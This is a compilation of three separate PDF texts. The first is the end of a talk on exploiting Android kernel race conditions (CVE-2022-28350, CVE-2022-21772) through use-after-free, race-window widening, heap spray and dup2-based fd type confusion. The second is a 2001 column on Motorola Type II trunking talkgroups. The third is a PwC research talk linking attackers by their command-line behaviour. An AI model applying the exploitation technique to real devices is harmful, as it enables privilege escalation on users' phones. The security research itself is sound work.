open(privileged_file_path, O_RDONLY);
write(<pipe>)
[pinned to CPU 1]
[idle priority]
[pinned to CPU 1]
[normal priority]
[pinned to CPU 2]
[normal priority]
Succeed in writing the privileged file!
My exploit for CVE-2022-28350
66
The exploit will succeed in a big chance :
Tested on an affected Android 12 device
Attack from an untrusted app
My exploit for CVE-2022-28350
67
Supplement
Exploit of CVE-2022-28350
• UAF caused by race condition in fd export operation
• Fd type confusion caused by race condition in fd import operation
Small race windows can be exploitable!
68
UAF caused by race condition in fd export operation
static long dev_ioctl(struct file *filp, unsigned int cmd, unsigned long
arg)
{
switch(cmd) {
case UAF_TEST:
{
int fd;
struct file *f;
void *cxt = kzalloc(128, GFP_KERNEL);
…
fd = get_unused_fd_flags(O_RDWR);
…
f = anon_inode_getfile("DEMO", &demo_fops, cxt,
O_RDWR);
…
fd_install(fd, f);
*(unsigned long *)(f->private_data) = 0xdeadbeef;
return put_user(fd, (int __user *)arg);
}
…
static int demo_release(struct inode *nodp, struct file *filp)
{
kfree(filp->private_data);
return 0;
}
static const struct file_operations demo_fops = {
.owner = THIS_MODULE,
.open = demo_open,
.release = demo_release
};
A typical issue with a tiny race window:
Very tiny race
windows!!!
69
Try to trigger the UAF:
User Space
Kernel space
file
Thread A
fd_install(fd, f);
*(unsigned long *)(f->private_data) =
0xdeadbeef;
Thread B
close(fd);
UAF
It is really hard to hit the race
because of tiny race window
tiny race window
UAF caused by race condition in fd export operation
70
If we want to exploit the issue:
User Space
Kernel space
file
Thread A
fd_install(fd, f);
*(unsigned long *)(f->private_data) =
0xdeadbeef;
Thread B
close(fd);
evil write
We can barely hit the race
because these operations are too
slow for the tiny race window
Open many files to try to reuse the
released file object
Release file object
Heap spray
tiny race window
UAF caused by race condition in fd export operation
71
Try to widen the race window with the method given by Jann Horn:
Thread A
Thread B
Thread C
read(<pipe>)
fd_install(fd, f);
*(unsigned long *)(f->private_data) = 0xdeadbeef;
close(fd);
Open many files to try to reuse the
released file object;
write(<pipe>)
[pinned to CPU 1]
[idle priority]
[pinned to CPU 1]
[normal priority]
[pinned to CPU 2]
[normal priority]
Evil write succeeds!
UAF caused by race condition in fd export operation
72
*(unsigned long *)(f->private_data) =
0xdeadbeef;
binder file
void *private_data
binder_proc
0xdeadbeef
UAF caused by race condition in fd export operation
We have a big chance to hit the race and turn the issue to a memory corruption:
73
Supplement
Exploit of CVE-2022-28350
• UAF caused by race condition in fd export operation
• Fd type confusion caused by race condition in fd import operation
Small race windows can be exploitable!
74
Fd type confusion caused by race condition in fd import operation
CVE-2022-21772
TEEC_Result TEEC_RegisterSharedMemory(struct TEEC_Context *ctx,
struct TEEC_SharedMemory *shm)
{
int fd;
size_t s;
struct dma_buf *dma_buf;
struct tee_shm *tee_shm;
…
fd = teec_shm_alloc(ctx->fd, s, &shm->id);
…
dma_buf = dma_buf_get(fd);
…
tee_shm = dma_buf->priv;
…
shm->shadow_buffer = tee_shm->kaddr;
…
return TEEC_SUCCESS;
}
import the dma-buf fd to get dma_buf
reference the “dma_buf->priv” as tee_shm
void *priv;
dma_buf
file
void *private_data;
tee_shm
create a specific dma-buf fd
75
create a specific dma-buf fd:
fd = teec_shm_alloc(ctx->fd, s, &shm->id);
User Space
Kernel space
Import the dma-buf fd to get dma_buf:
dma_buf = dma_buf_get(fd);
reference the “dma_buf->priv”:
tee_shm = dma_buf->priv;
close(fd);
fd = create_a_diff_dma_buf_fd();
fd type confusion happens!
Thread A
Thread B
recreate the fd
race window
We can hardly hit the
race because the
operations are too slow
for the race window
Fd type confusion caused by race condition in fd import operation
76
create a specific dma-buf fd:
fd = teec_shm_alloc(ctx->fd, s, &shm->id);
User Space
Kernel space
Import the dma-buf fd to get dma_buf:
dma_buf = dma_buf_get(fd);
reference the “dma_buf->priv”:
tee_shm = dma_buf->priv; fd type confusion happens!
Thread A
Thread B
recreate the fd
race window
We only want to finish the work:
fd_array[fd] = another dma_buf file
Are there any other
syscalls which can
finish this work
faster?
Fd type confusion caused by race condition in fd import operation
77
Syscall:dup2(int oldfd, int newfd)
static int do_dup2(struct files_struct *files,
struct file *file, unsigned fd, unsigned flags)
__releases(&files->file_lock)
{
…
rcu_assign_pointer(fdt->fd[fd], file);
…
if (tofree)
filp_close(tofree, files);
return fd;
…
}
fd_array[fd] = file
release the old file
dup2() can finish the “fd_array[fd] = another dma_buf file” much faster !
Fd type confusion caused by race condition in fd import operation
78
create a specific dma-buf fd:
fd = teec_shm_alloc(ctx->fd, s, &shm->id);
User Space
Kernel space
Import the dma-buf fd to get dma_buf:
dma_buf = dma_buf_get(fd);
reference the “dma_buf->priv”:
tee_shm = dma_buf->priv; fd type confusion happens!
Thread A
Thread B
recreate the fd
race window
dup2(diff_dma_buf_fd, fd);
int diff_dma_buf_fd =
create_a_diff_dma_buf_fd();
Fd type confusion caused by race condition in fd import operation
79
void ion_buffer_destroy(struct ion_buffer *buffer)
{
…
buffer->heap->ops->free(buffer);
vfree(buffer->pages);
kfree(buffer);
}
void *priv;
dma_buf
file
void *private_data;
ion_buffer
fd
struct ion_heap *heap;
memory corruption
We have a big chance to hit the race and turn the issue to a memory corruption:
Fd type confusion caused by race condition in fd import operation
80
Thank you!
81 | pdf |
Motorola Type II Trunking
http://www.signalharbor.com/ttt/01apr/index.html
1 of 6
6/18/2007 14:11
This article first appeared in the April 2001 issue of Monitoring Times.
MOTOROLA TYPE II TRUNKING
With all of the various trunk-tracking scanners and software out there it is sometimes difficult to
make sense of talkgroup numbers and understand why they occasionally change during a
conversation. This month we'll take a look at Motorola Type II talkgroups and the different ways
they can be displayed. We'll also report on a new radio system being built by Motorola for the
state of Illinois.
Type II Talkgroups
Since your site seems to be becoming something of a collection point for tiny
bits of the trunked jigsaw, if you are interested, the codes showing up on my
780 for Palm Springs Police Department in California are:
32784 - main channel
32816 - secondary
32912 - surveillance
There are batches of other things ranging from the Airport to the dogcatcher
but I haven't logged them down. The reason I note the above numbers is
that they are distinctly different from those shown in the Uniden/Bearcat
booklet which are in the format 200-13, 400-04, etc.
Regards, David
David, congratulations on your purchase of a Uniden 780XLT scanner. Although the manual for
the scanner is pretty good, there is often confusion about the way a talkgroup may be displayed.
The City of Palm Springs, California, is listed as having a Motorola hybrid system, which means
it carries both Type I and Type II traffic. Apparently the Police Department uses Type II radios
and the other city services use Type I. Five frequencies are licensed to the city, namely
857.4875, 858.4875, 858.9625, 859.4875 and 860.7125 MHz.
Type I and Type II transmissions both use sixteen binary digits, or bits, to represent a talkgroup.
These bits are sent out with every repeater transmission and are interpreted by your scanner.
Motorola Type II Trunking
http://www.signalharbor.com/ttt/01apr/index.html
2 of 6
6/18/2007 14:11
A Type I system divides up those 16 bits into blocks, fleets, subfleets, and users. Talkgroups in
Type I systems are usually displayed as FFF-SS, where FFF is a Fleet ID and SS is a subfleet
ID. The trick with Type I systems is determining exactly how a particular system divides up
those 16 bits. That information is represented by a fleet map, which I described in detail in the
August 2000 Tracking the Trunks column. Back issues of Monitoring Times are $4.50 from
Grove Enterprises 800-438-8155 and previous Tracking the Trunks columns are on my website
at www.signalharbor.com.
Status Bits
A Type II system divides the 16 bits differently than a Type I system. The 16 bits in a Type II
system are split into 12 bits of talkgroup identifier and 4 status bits. The status bits identify
special situations and are usually all zeroes.
Right-most
Status Bits Decimal Meaning
000
0
Normal transmission
001
1
Fleet-wide (A talkgroup for all radios)
010
2
Emergency
011
3
Crosspatch between talkgroups
100
4
Emergency crosspatch
101
5
Emergency multi-select
110
6
Unknown
111
7
Multi-select (initiated by the dispatcher)
The three right-most status bits indicate if the message is an emergency and whether the
talkgroup is interconnected in some way. The left-most status bit indicates whether or not the
transmission is encrypted using the Data Encryption Standard (DES). A zero bit means the
message is not encrypted and a one bit means it is encrypted. For example, a normal message has
status bits of 0000 (0 in decimal). If that transmission was encrypted, it would have status bits
of 1000 (8 in decimal). An emergency message that is not encrypted has status bits of 0010 (2
in decimal), while an encrypted emergency message would have status bits of 1010 (10 in
decimal). Note that an encrypted message implies that it is in digital format and that it will come
out of your scanner as a harsh buzzing sound instead of the radio user's voice.
The complete set of sixteen bits that make up a talkgroup can be displayed a number of ways.
They can be shown as a decimal number, like 32784 or 59216. They may also appear as
hexadecimal numbers, such as 801 or E75.
The conversion between decimal and hexadecimal is straightforward. The easiest way is to use a
scientific calculator, and it just so happens that one comes with Microsoft Windows.
In Windows, Press the Start button, select Programs and then Accessories. Click on the
Calculator selection to start the Windows calculator program. Once the calculator program
is running, you'll need to switch from Standard to Scientific mode, which you can do by clicking
on "View" in the menu bar and choosing "Scientific".
Motorola Type II Trunking
http://www.signalharbor.com/ttt/01apr/index.html
3 of 6
6/18/2007 14:11
The scientific calculator has quite a few buttons, but we're only interested in the selections in the
upper left-hand side just below the display. The program starts out with "Dec" (decimal) option
selected, meaning the display will show numbers in the usual decimal format.
In David's example, the main channel has a decimal talkgroup of 32784. So, in the calculator we
enter 32784 and then select the "Hex" (hexadecimal) option. The display changes to show
8010. Each hexadecimal digit represents four bits of the talkgroup number, with the last digit
representing the status bits. Because the last four bits are zero for a normal talkgroup, many
listings drop the last digit of the hexadecimal number. In David's example the talkgroup would
be represented in hex as 801.
We can also view the same number in binary by choosing the "Bin" option. 32784 is equivalent
to 1000 0000 0001 0000. These are the sixteen bits that make up the Type II talkgroup.
The last four bits are all zero, meaning the status bits are indicating this ID is a normal talkgroup.
Motorola Type II Trunking
http://www.signalharbor.com/ttt/01apr/index.html
4 of 6
6/18/2007 14:11
In fact, the status bits in each of the three talkgroups David mentions are all zero:
Decimal Hexadecimal Binary
32784 8010
1000 0000 0001 0000
32816 8030
1000 0000 0011 0000
32912 8090
1000 0000 1001 0000
Interesting things happen when the status bits are something other than zero. If, for example, the
Palm Beach surveillance talkgroup of 32912 had an emergency message, the status bits would
change from 0000 to 0010, so the sixteen bits of the talkgroup then become 1000 0000
1001 0010. If we put this binary number into the calculator and convert it to decimal, we find
the new decimal number to be 32914.
Some scanners may be preset to ignore status bits in a Motorola system and always report the
same talkgroup no matter what happens. This feature may have to be disabled in order to figure
out Type I fleet maps, but is handy for following Type II conversations.
Other scanners will always display the full talkgroup number, which may change during a
conversation depending on the status bits. This can cause the scanner to miss conversations if
each of the possible talkgroups are not programmed into the scan list.
To sum up for David, the numbers he's reporting are valid Type II talkgroups from the Palm
Springs Police Department. The other numbers in the format FFF-SS are talkgroups from the
other Type I radios that share the hybrid system.
Illinois Starcom 21
Dan,
I read your pages in Monitoring Times January 2001 and decided to drop
you a line. I got this information from a local newspaper just last week.
Illinois Governor Ryan announced a $25 million grant for a new radio system
phased in over the next 3 years. The state will lease time on the new
Starcom 21 network from Motorola. It will be made available to other federal,
state, and local public safety agencies if they want to update their own
outmoded systems.
Reading between the lines, I would say the state police are going to phase
out their low band radio system statewide. Also I would assume the Illinois
Department of Transportation 47 MHz system will follow also. The VHF 155
MHz state police frequency will have to stay in place for use with other police
departments (ISPERN, IREACH etc.) As we already know the state police
districts in the Chicago area are already using 800mhz.
I don't know anything about Starcom21-is there a scanner yet that will work
with this system? Or is this digital? Maybe a competitive brand two-way radio
down the road properly programmed will be around. A the rate everyone is
going, no one will be left on lowband. I've always said give 29.7 - 54 MHz to
us hams (we like skip conditions) and trade part of the 440 MHz and also 1.2
Motorola Type II Trunking
http://www.signalharbor.com/ttt/01apr/index.html
5 of 6
6/18/2007 14:11
GHz for commercial use (they don't like skip).
Daryl
Thanks for the information, Daryl. Funding for the Starcom 21 network comes out of the
Venture TECH fund from the Illinois Technology Office. This fund promises to provide research
and development dollars for a number of law enforcement initiatives, including expansion of the
Illinois State Police Wireless Information Network, wireless access to photographic images and
fingerprints, more rapid access to wants and warrants databases, and an automated voice
dispatch system. The new Starcom 21 network is one of those initiatives.
Motorola, headquartered in the Chicago suburb of Schaumburg, was selected to build Starcom
21after a competitive bid process. The Illinois State Police will purchase new radios and lease
airtime on the network, as will other federal, state, and local public safety agencies. Rather than
spending a lot of money to establish their own independent systems, county and local agencies
will have the option of joining the state network.
The plan is to phase in the network over three years, starting with coverage in the southern part
of the state and moving northward. The state hopes that by having one common radio system,
problems of interoperability -- the ability of agencies to communicate directly with each other --
will be a thing of the past.
As Daryl noted, the Chicago District of the Illinois State Police is currently using a trunked radio
system. It's actually two EDACS networks, one covering a northern patrol area and the other a
southern patrol. Frequencies in LCN (Logical Channel Number) order are:
North: 866.8875, 866.4625, 867.3875, 866.9625, 867.4625, 867.8875, 868.3875, 868.4625,
868.8875 and 868.9625 MHz.
South: 866.4125, 866.4375, 866.9375, 867.4125, 867.9375, 867.9125, 868.4375, 868.4125,
868.9375 and 868.9125 MHz.
Unfortunately, I don't have any technical details about the Starcom 21 system. I expect that it
will be a trunked digital system, but I don't know if it will be compatible with other Motorola
products or with the APCO 25 standards, or something all together new. If readers have any
further information about the system, please send it along!
NPSPAC
Starcom 21 will almost certainly have the capability of operating on the National Public Safety
Planning Advisory Committee (NPSPAC) 800 MHz frequencies. The NPSPAC was formed
more than ten years ago to provide guidance in the use and coordination of public safety radio
frequencies, and their recommendations included the establishment of common inter-agency
frequencies.
Five channels in the 800 MHz band are set aside for mutual aid across the country. One
frequency, 866.0125 MHz, is designated a calling channel. The other four, at 866.5125,
867.0125, 867.5125 and 868.0125 MHz, are tactical channels. Each of these channels is 25 kHz
wide and operates conventionally (that is, not trunked) with a tone coded squelch frequency of
156.7.
Motorola Type II Trunking
http://www.signalharbor.com/ttt/01apr/index.html
6 of 6
6/18/2007 14:11
So, as you're scanning the 800 MHz band, be sure to include these five non-trunked frequencies
in one of your scan banks.
That's all for this month. More information is available on my website at www.signalharbor.com,
and I welcome your e-mail at [email protected]. Until next month, happy monitoring!
Comments to Dan Veeneman
Click here for the index page.
Click here for the main page. | pdf |
Betrayed by the keyboard
How what you type can give you away
Matt Wixey
Research Lead, PwC UK Cyber Security
www.pwc.com
Building a secure
digital society.
PwC │ 2
Disclaimer
•
This content is presented for educational purposes only
•
What this presentation isn’t…
PwC │ 3
Introduction
Matt Wixey
• Research Lead for the Cyber Security BU
• Work on the Ethical Hacking team
• PhD student at UCL
• Previously worked in LEA doing technical R&D
PwC │ 4
Why this talk?
• Based on some research I did at UCL
• Interest in side-channel attacks
• Humans have side-channels too
• Previous work on forensic linguistics
• First degree = English Literature and Language
PwC │ 5
Agenda
• What is attribution?
• Problems
• Case Linkage Analysis
• Experimentation
• Results
• Implications
• Summary
PwC │ 6
What is attribution?
• Why would we want to do it?
• Benefits
• Types
• Approaches
PwC │ 7
What is attribution?
• Identifying an attacker’s location?
• Hunker et al, 2008; Wheeler and Larsen, 2003
• Identify the country or organisation behind an attack?
• Rid and Buchanan, 2014
• “Determining who is responsible for a hostile cyber act”?
• Mejia, 2014
• “We must find a person, not a machine”
• Clark and Landau, 2011
PwC │ 8
Benefits of attribution
• Deterring future attacks
• Improving defences
• Interrupting and disrupting attacks (Hunker et al, 2008)
• Does attribution actually lead to deterrence? (Guitton, 2012)
• Regardless, attribution is a desirable outcome (depending on
which side you’re on!)
PwC │ 9
Types of attribution
• Hutchins et al, 2011:
Atomic
Computed
Behavioural
PwC │ 10
Problems with attribution
• Hiding atomic IOCs
• Issues with computed IOCs
• Lack of tangible benefits from
behavioural IOCs
PwC │ 11
Hiding atomic IOCs
• These are the most effective identifiers
• Easy to resolve (usually)
• But also easiest to spoof/anonymise/obfuscate
PwC │ 12
Issues with computed IOCs
• Changes to malware make it harder
• Other methods:
• Correlating activity with office hours in timezones (Rid & Buchanan,
2014; CloudHopper, 2017)
• Deanonymising developers through artefacts (Caliskan et al, 2015)
• Similar malware capabilities (Moran & Bennett, 2013; Symantec, 2011)
• Distinguishing humans vs bots (Filippoupolitis et al, 2014)
PwC │ 13
Mo methods, mo problems
• Less focused on individuals
• Sufficient if aim is to identify a state/sponsor
• Challenge is then legal/procedural
PwC │ 14
Behavioural profiling
• Less attribution
• More trying to understand who hacks, and why
• Motivation, skills, attack behaviours (Landreth, 1985)
• Attitudes and culture (Chiesa et al, 2008; Watters et al, 2012)
• Psychological (Shaw et al, 1998)
PwC │ 15
Attack profiling
• Humans vs bots
• Filippoupolitis et al, 2014: Skill, education, typing speed, mistakes, etc
• Skill level
• Salles-Loustau et al, 2011: SSH honeypot. Stealth, enumeration, malware
familiarity, protection of target
• Attacker behaviour
• Ramsbrock et al, 2007: Specific actions undertaken
PwC │ 16
The problem
• Profiling attackers is interesting
• Next logical step is comparison
• To what extent is an attacker’s profile similar to another’s?
• Not really explored
PwC │ 17
• The idea
• Discovering case linkage analysis
• Benefits of linking offences
• What case linkage analysis is (and isn’t)
• Methodology
• Example
• Exceptions
Case Linkage Analysis
PwC │ 18
The idea
• I had an idea (rare occurrence - to be celebrated)
• Lurking in OSCP labs a few years ago
• Discussing attack techniques, commands, methodologies
• Casual observation 1: everyone has their own way of doing things
• Casual observation 2: this way of doing things rarely changes
PwC │ 19
Science!
• This seems obvious
• My first degree was English Lit
• Could pretty much make it up as you went along
• Apparently, in science, you have to prove stuff
• Can’t just write “this seems obvious”
• Science is hard
PwC │ 20
Discovering case linkage analysis
• How could I empirically test this?
• Came across “Case Linkage Analysis”
• Methodology used in crime science literature
• Designed to link separate crimes to common offenders
• Based on behavioural aspects (Woodhams & Grant, 2006)
PwC │ 21
Benefits of linking offences
• Can attribute previously unsolved crimes
• Can investigate offences under one grouping – focused resources
• Useful evidentially
• Database of offences grows = better chance of success
• A minority of offenders commit the majority of crimes (?)
• Not necessarily true of crime generally
• But more accurate with specialist crimes
PwC │ 22
Benefits of linking offences
• Best method for linking: physical evidence (DNA, fingerprints, etc)
• Highly accurate, but:
• May be absent or inconclusive (Grubin et al, 1997)
• Does not really apply to cyber attacks
• Closest approximation is forensic artefacts, but these are not always unique
• Time-consuming and expensive (Craik and Patrick, 1994)
PwC │ 23
What case linkage analysis is
• Uses behavioural evidence
• Things the offender does during the commission of an offence
• Classify granular crime behaviours into domains
• Create linked and unlinked pairs of offences
• Compare with behaviours in other offences
• Determine degree of similarity
PwC │ 24
What case linkage analysis isn’t
• It’s not offender profiling
• Offender profiling makes inferences about the offender
• Based on assumption of consistency between criminal and
everyday behaviour (Canter, 2000)
• Based on this behaviour, I infer that the perpetrator is a balding but
charismatic researcher from the UK
PwC │ 25
What case linkage analysis isn’t
• CLA: statistical inferences about the similarity of 2 or
more offences, based on common behaviours
• Crime A, perpetrated by Matt “Charismatic But Balding”
Wixey, has several features in common with Crime B
• Therefore, Wixey may have also committed Crime B
PwC │ 26
Case linkage analysis in context
• Two key assumptions
• Behavioural consistency
• Offenders display similar offending behaviours across crimes
• Behavioural distinctiveness
• The way an offender commits crimes is characteristic of that offender
• And distinguishable from the style of other offenders (Canter, 1995)
PwC │ 27
Case linkage analysis in context
• Both assumptions must be present
• Otherwise CLA is unlikely to be useful
• e.g. homicide: dumping a body in a remote location is
consistent for many offenders
• But not distinctive
PwC │ 28
Case linkage analysis in context
• Individuals have stable, distinctive responses (Shoda et al, 1994)
• Cognitive-affective personality system (CAPS)
• Mischel & Shoda, 1995; Mischel, 1999
• System of goals, expectations, beliefs, plans, strategies, memories
• CAPS is consistent yet distinctive (Zayas et al, 2002)
PwC │ 29
Case linkage analysis in context
• Assumptions of stability/distinctiveness made in other fields
• Forensic linguistics
• Word and sentence length; slang; typos; errors; syntax; idiolect; article
frequency; syllable count; punctuation; hapax legomena; sentence length;
stylistics
• Language is socially acquired, continually – so may change
• Some biometrics
• Typing speed; typos; typing habits
PwC │ 30
Case linkage analysis – does it work?
• Consensus: yes, in most cases
• Observed variance significantly smaller in linked crimes
• Grubin et al, 1997; Mokros & Alison, 2002
• Significant evidence for cross-situational consistency
• Both criminal and non-criminal behaviours (Tonkin et al, 2008)
PwC │ 31
Methodology
• Separate behaviours into domains
• Calculate similarity coefficient
• Input into logistic regression model
• Determine optimal combination of domains
• Receiver Operating Characteristic (ROC) curves
PwC │ 32
Methodology
• Lots of stats stuff
• I hate stats. I am bad at stats.
• Will try and explain this with a worked example
• None of that “left as an exercise for the reader” nonsense
PwC │ 33
Example
• Two burglaries, A and B
• We want to find out if the same offender did both
• Define a dichotomous dependent variable
• This is a Y/N question, and we’re trying to ‘predict’ the answer
• And find out what variables contribute more
• “Are these two crimes linked?”
PwC │ 34
Example
• Take granular behaviours and put them into domains
• e.g. Entry behaviours = method of entry; tools used; time of day; etc
• Property behaviours = property taken; property damaged; and so on
• These are our independent variables
• Make these dichotomous by turning into yes/no questions
• e.g. Entry behaviours: “was a screwdriver used? Was a crowbar used?
Was a window open? Were the occupants home?” etc
PwC │ 35
Example
• Then apply a similarity coefficient
• Index of similarity
• Jaccard’s is coarse, but the measure of choice (Tonkin et al, 2008)
• x = count of behaviours present in both
• y = count of behaviours present in A but not in B
• z = inverse of y
PwC │ 36
Example
• 1 = perfect similarity
• 0 = perfect dissimilarity
• 1 coefficient per domain
• Ignores joint non-occurrences
• This is a concern when dealing with police data
• Something may have been present, but not recorded
• Less of a concern in this case
PwC │ 37
Example
• Each coefficient into direct logistic regression model
• Predictive analysis
• “To what extent does a given factor contribute to an outcome?”
• e.g. “to what extent does being a smoker contribute to the risk of having a
heart attack?”
• Or “does similarity in the entry behaviours domain predict whether or
not the two burglaries are linked?”
PwC │ 38
Example
• Logistic regression tells us:
• Whether a variable is positively or negatively correlated with the outcome
• How well a given variable fits with the data
• The amount of variance that a given variable explains
• A p-value (probability of seeing this result if the null hypothesis is true)
• Run for each domain
PwC │ 39
Example
• Then forward stepwise logistic regression
• Start with one domain
• Add a domain at each step
• If this contributes to the model’s predictive power, keep it
• Else discard it
• Determines optimal combination of domains
PwC │ 40
Example
• Regression results into ROC curves
• Graphical representation
• x (probability of false positive) against y (probability of true positive)
• More reliable measure of predictive accuracy
• Based on area under the curve (AUC)
PwC │ 41
Example
• Overcomes statistical issue of using pairs from same sample
(Tonkin et al, 2008)
• No reliance on arbitrary thresholds (Santtila et al, 2005)
• Measure of overall predictive accuracy (Swets, 1988)
PwC │ 42
Example
http://www.statisticshowto.com/wp-content/uploads/2016/08/ROC-curve.png
• Diagonal: no better than
chance
• The higher the AUC value, the
greater the predictive accuracy
• 0.5 – 0.7 = low
• 0.7 – 0.9 = good
• 0.9 – 1.0 = high
• Swets, 1988
PwC │ 43
Exceptions
• Some offences are less suitable, e.g. homicide
• Bateman & Salfati, 2007; Harbort & Mokros, 2001; Sorochinski & Salfati, 2010
• Some offenders show more distinctiveness than others
• Bouhana et al, 2016
• Some behaviours less consistent, e.g. property stolen in burglaries
• Bennell & Canter, 2002; Bennell & Jones, 2005
PwC │ 44
Exceptions
• MO is a learned behaviour, and offenders develop
• Pervin, 2002; Douglas & Munn, 1992
• Offenders will change behaviours in response to events
• Donald & Canter, 2002
• Behaviours under offender’s control more likely to be stable
• Furr & Funder, 2004; Hettema & Hol, 1998
• So offences involving victim interaction may differ
• e.g. whether victim fights back / runs / shouts for help, etc
PwC │ 45
Exceptions
• Most research only applied to solved crimes
• Woodhams & Labuschagne, 2012
• Relatively small samples
• Only serial offences
• Slater et al, 2015
PwC │ 46
Experimentation
• Concept
• Research design
• Hypothesis
• Analysis
• Results
PwC │ 47
Concept
• Could CLA be applied to network intrusions?
• Specifically, where attacker has code execution
• Has never been done before
• Take granular behaviours (keystrokes, commands, etc)
• Apply CLA methodology
PwC │ 48
Research design
• Common approach historically: use police reports
• Can be inaccurate and/or incomplete
• Victim accounts may be inaccurate
• Alison et al, 2001; Canter & Alison, 2003
• Crimes are often traumatic
• Traumatic experiences can distort memories
• Freyd, 1996; Halligan et al, 2003
PwC │ 49
Research design
• Crime reports unlikely to be granular enough
• Previous studies on attacker profiling used simulations
• Honeypot?
• Needed ground truth, as CLA previously untested on this offence type
• Same IP addresses do not guarantee same individual at keyboard
• Need to also distinguish between bots and humans
• Honeypots can be fingerprinted
• Attackers may deliberately change approach
PwC │ 50
Research design
• Modified open source Python SSH keylogger (strace)
• https://github.com/NetSPI/skl
• Two VMs, exposed on the internet (SSH)
• One account per user per box
• Deliberate privesc vulnerabilities
• Plus fake data to exfiltrate
PwC │ 51
Research design
• Obtained participants
• 10x pentesters / students / amateur enthusiasts
• Asked to SSH into both machines and try to:
• Get root
• Steal data
• Cover tracks
• Poke around
• Meanwhile, I recorded all keystrokes on each VM
PwC │ 52
Hypothesis
Cyber attackers will exhibit consistent and distinctive
behaviours whilst executing commands on compromised hosts,
which will provide a statistically significant basis for
distinguishing between linked and unlinked attack pairs.
PwC │ 53
Analysis
•
Split into behavioural domains, 40 behaviours each:
•
Navigation – moving through filesystem
•
Enumeration
•
Exploitation – privesc and exfil attempts
•
Also coded for 3 metadata variables:
•
Number of ms between each keystroke
•
Number of ms between each command
•
Number of backspaces (as percentage of all keystrokes)
PwC │ 54
Metadata variables
• Non-dichotomous
• Used in other CLA work, in addition to behavioural domains
• Intercrime distance (Bennell & Canter, 2002)
• Temporal proximity (Tonkin et al, 2008)
• Filippoupolitis et al, 2014: commands typed per second
• Problematic: length of command, time to complete, and time spent
interpreting or manipulating output
PwC │ 55
Example behaviours
PwC │ 56
Analysis
• Average attack time per host: 133.34 minutes
• Average commands per host: 243
• 2 participants got root on Host A
• 1 participant got root on Host B
PwC │ 57
Similarity coefficients
• 10 attackers, 2 machines = 100 crime pairs
• Compare each attack against Host A to each attack against Host B
• 10 linked pairs, 90 unlinked pairs
• Wrote application to calculate the similarity coefficient:
• For each pair for the 3 behavioural domains
• And differences between the 3 metadata variables
• Ended up with CSV file:
• ID, paired (y/n), coefficients for each domain, differences for each metadata
variable
PwC │ 58
Similarity coefficients - behaviours
PwC │ 59
Similarity coefficients - metadata
PwC │ 60
Logistic regression
• Imported CSV file into SPSS
• Strenuous Package for Sad Students
• Significant Probability of Statistics-related Stress
• Direct logistic regression for each predictor variable
• Then forward stepwise logistic regression
• Six models in total, for each domain
• Plus an optimal combination/order of all domains
PwC │ 61
Results
Here comes the slide you’ve all been waiting for…
PwC │ 62
Results
PwC │ 63
You’re too kind
(waits for applause to die down)
PwC │ 64
PwC │ 65
What does this tell us?
• Three behavioural domains can classify linked/unlinked offences
• High level of accuracy
• Navigation: most effective predictor
• Followed by exploitation, then enumeration
• Strong positive correlation to dependent variable
• Keystroke and command interval variables not reliable predictors
• Backspace: weak negative correlation to linkage
• Results statistically significant for behavioural domains
• But not for any metadata variables
PwC │ 66
ROC curves
• Results used to build ROC curves
PwC │ 67
ROC curves
I got 0.992
AUC, but it
just ain’t 1
https://www.discogs.com/artist/21742-Jay-Z#images/30264081
Jay-Z
(A ROC fella)
PwC │ 68
ROC curve results
• Navigation = 0.992
• Enumeration = 0.912
• Exploitation = 0.964
• Keystroke internal = 0.572
• Command interval = 0.58
• Backspace variable = 0.702
• Optimal model (navigation & enumeration) = 1.0
PwC │ 69
Implications
• Observations & comparisons
• Investigation implications
• Privacy implications
• Defeating CLA
• Threats to validity
PwC │ 70
Observations & comparisons
• High levels of consistency and distinctiveness
• Navigation and enumeration combined
• No need for exploitation (in this study)
• Why was navigation specifically so prominent?
• Something everyone does, every day
• Enumeration & exploitation only done during attacks
• Navigation behaviours may be more ingrained
PwC │ 71
Observations & comparisons
• Higher accuracy than other crime types
• Behaviours less subject to influence may be more stable
• Nature of offence: offenders less likely to be influences
• Broader approach may change
• But possibly not granular command choice
• Especially navigation
PwC │ 72
Observations & comparisons
• Metadata variables significantly weaker
• What you type has greater linking power than how you type
• Latency may have affected some of the results
• But mistakes/typos show some promise
• Needs further exploration
PwC │ 73
Implications for investigators
• Can link separate offences to common offenders
• With no atomic or computed IOCs
• But need a lot of information
• Previous CLA/attribution work: limited, specific info required
• Bennell & Canter, 2002; Hutchins et al, 2010; Clark & Landau, 2011
• Here, need as much as possible
• As granular as possible
PwC │ 74
Implications for investigators
• Need to be in a position to capture commands/keystrokes
• High-interaction honeypots
• Verbose and detailed logging
• Backdoored CTFs or vulnerable VMs
PwC │ 75
Implications for investigators
• Could also link attackers who trained together
• Or who have all done a certain certification
• Sample commands and code
• Dilutes CLA assumption of distinctiveness
• But could still assist with attribution
PwC │ 76
Privacy implications
• People can be linked to separate hosts/identities
• Based on approaches, syntax, and commands
• Regardless of anonymising measures
• Regardless of good OPSEC elsewhere
PwC │ 77
Privacy implications
• Like forensic linguistics, exploits stable behavioural traits
• Won’t be 100% accurate obviously
• And affects less of the population, cp. forensic linguistics
• e.g. ~86% of the population is literate*
• Less people than that can operate a command-line
* https://data.worldbank.org/indicator/SE.ADT.LITR.ZS, 27/06/18
PwC │ 78
Privacy implications
• This study only focused on commands
• May also apply to:
• Typos, and the way you correct them
• How you form capitals
• Using PgDn/PgUp
• Using arrow keys rather than the mouse
• Tabs/spaces
• Keyboard shortcuts
• Use of, and preference for, bracket types
PwC │ 79
Privacy implications
• If someone can log your keystrokes, you have issues anyway
• But this is less about identification
• If someone can log your keystrokes, it’s not hard to find out who you are
• This is more about attribution via linkage
• Could be used to link you to historical/future activity
• Used to build up repository of command profiles
PwC │ 80
Defeating CLA
• Similar to defeating authorship identification
• Make a conscious decision to disguise your style
• Forensic linguistics: solutions range from crude (Google Translate) to
sophisticated (automated changes to sentence construction, synonym
substitution, etc)
• CLA different – e.g. alias command would not work
• Hard to automate – can’t predict commands in advance
• Could semi-automate, using scripts
PwC │ 81
Note on Google Translate
• @InsightfulRobot)created by colleague Keith Short (@ItsNotKeith)
• Turns: People who succeed have momentum. The more they succeed, the
more they want to succeed, and the more they find a way to succeed.
Similarly, when someone is failing, the tendency is to get on a downward
spiral that can even become a self-fulfilling prophecy.
• into:
PwC │ 82
Note on Google Translate
• English -> Norwegian
• Norwegian -> French
• French -> Afrikaans
• Afrikaans -> Romanian
• Romanian -> Japanese
• Japanese -> English
U wot m8
PwC │ 83
Defeating CLA
• Conscious changes are probably the best way to do it
